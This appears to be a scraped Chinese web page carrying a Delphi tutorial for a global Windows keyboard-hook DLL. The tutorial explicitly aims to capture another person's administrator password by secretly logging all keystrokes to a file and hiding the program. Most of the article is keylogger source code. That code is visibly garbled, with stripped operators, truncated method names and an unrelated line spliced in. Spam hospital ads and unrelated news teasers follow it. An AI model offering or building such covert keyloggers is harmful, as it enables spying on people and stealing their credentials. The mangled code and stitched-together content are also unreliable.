编程使用监视物业
民生舆情 2021-08-24 13:36 字号: 大 中 小
每个程序都有自己的生存空间,在Windows系统中你可以在任何时候让你的程序执行一些操作,还可以触发消息,触发的消息分为三种,一是操作你程序的界面,onClick,onMouseMove等等,另外一个可以使用Windows的消息机制来捕获一些系统消息,但是如果你想在任何时候监控任何程序的情况那可能你就会选择HOOK来实现了,虽然还有其他方法,但不得不承认,HOOK是一个比较简单解决问题的途径。
下面就来举个例子(使用Delphi7.0调试通过):
如果你需要访问某个人的机器,那在运行\\\\SB之后那个人就会在你机器上敲入他的adminsitrator密码,当然,你也可以使用黑客工具来得到他的密码,但是,为什么不自己尝试一下写个程序记录所有的键盘操作呢?
首先需要申明一点,Hook不同于一般的应用程序,需要作为一个全局DLL出现,否则无法在你程序不激活的状态捕获其他信息的,(当然你可以用Windows消息,这个问题不在这里讨论)。
写个DLL定义一下函数
function setkeyhook:bool;export;
function endkeyhook:bool;export;
procedure keyhookexit;far;
procedure SetMainHandle(Handle: HWND); export;forward;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
procedure EntryPointProc(Reason: Integer);
const
hMapObject: THandle = 0;
begin
case reason of
DLL_PROCESS_ATTACH:
begin
hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT’);
rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);
end;
DLL_PROCESS_DETACH:
begin
try
UnMapViewOfFile(rHookRec);
CloseHandle(hMapObject);
except
end;
end;
end;
end;
procedure keyhookexit;far;
begin
if hNexthookprocgt;0 then endkeyhook;
exitproc:=procsaveexit;
end;
function endkeyhook:bool;export;
begin
if hNexthookproc0 then
begin
unhookwindowshookex(hNexthookproc);
hNexthookproc:=0;
messagebeep(0);
end;
result:=hNexthookproc=0;
MainHandle:=0;
end;
function Setkeyhook:bool;export;
10、 反复跳槽不可取 begin
hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);
result:=hNexthookproc0;
end;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
var
s:Tstringlist;
begin
if icode0 then
begin
result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);
exit;
end;
if lparam0 then
begin
exit;
end;
s:=eate;
if FileExists(afilename) then
adFromFile(afilename);
//将敲打的键盘字符保存到文件中
d(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) + char(wParam) );
veToFile(afilename);
ee;
result:=0;
end;
Dll的Project文件中定义如下
exports
setkeyhook index 1,
endkeyhook index 2,
SetMainHandle index 3;
begin
hNexthookproc:=0;
procsaveexit:=exitproc;
DllProc := @EntryPointProc;
EntryPointProc(DLL_PROCESS_ATTACH);
end.
这样DLL就定义好了,接下来就是画个界面:
function setkeyhook:bool;external ’l’;
function endkeyhook:bool;external ’l’;
procedure SetMainHandle(Handle: HWND); external ’l’;
//开始捕获键盘
SetMainHandle(handle);
setkeyhook
//中止捕获键盘
endkeyhook
然后吧你程序隐蔽起来,启动捕获键盘,在中止捕获之前,所有键盘操作都会被记录到你所定义的filename这个文件名中去,注:这些代码是临时写的,仅是为了说明如何写个hook程序。
另外Hook的功能不仅仅是简单使用,这就需要靠大家灵活运用了,可以跟很多windows API来配合,通过很多技巧作出让人意想不到的效果。查看本文来源
承德男科医院哪家好西安哪里治疗妇科
天津看白癜风权威医院
-
-
卫生间如何干湿分离教你最简单的方法搭配
卫生间如何干湿分离?教你最简单的方法卫生间做干湿分离是...
2020-06-01 | 民生舆情
-
-
全国男排联赛北京11连胜积分第1上海31搭配
全国男排联赛北京11连胜积分第1 上海力挫河南赛季全国男排联...
2020-05-31 | 民生舆情
-
-
2017田径世锦赛参赛标准中国将派24男搭配
2017田径世锦赛参赛标准 中国将派24男26女参赛2017年8月4日—8月...
2020-05-29 | 民生舆情
-
-
费雷拉vs波尔图分析费雷拉目标保级波尔图搭配
费雷拉vs波尔图分析 费雷拉目标保级,波尔图联赛争冠北京时间...
2020-05-28 | 民生舆情
-
-
当涂县正式启动千年古县申报工作
当涂县正式启动“千年古县”申报工作近日,当涂县召开申报...
2019-07-16 | 民生舆情
-
-
奉贤区雅韵文化艺术传承中心开展剪纸刻纸活
奉贤区雅韵文化艺术传承中心开展剪纸、刻纸活动为丰富杨王...
2019-07-16 | 民生舆情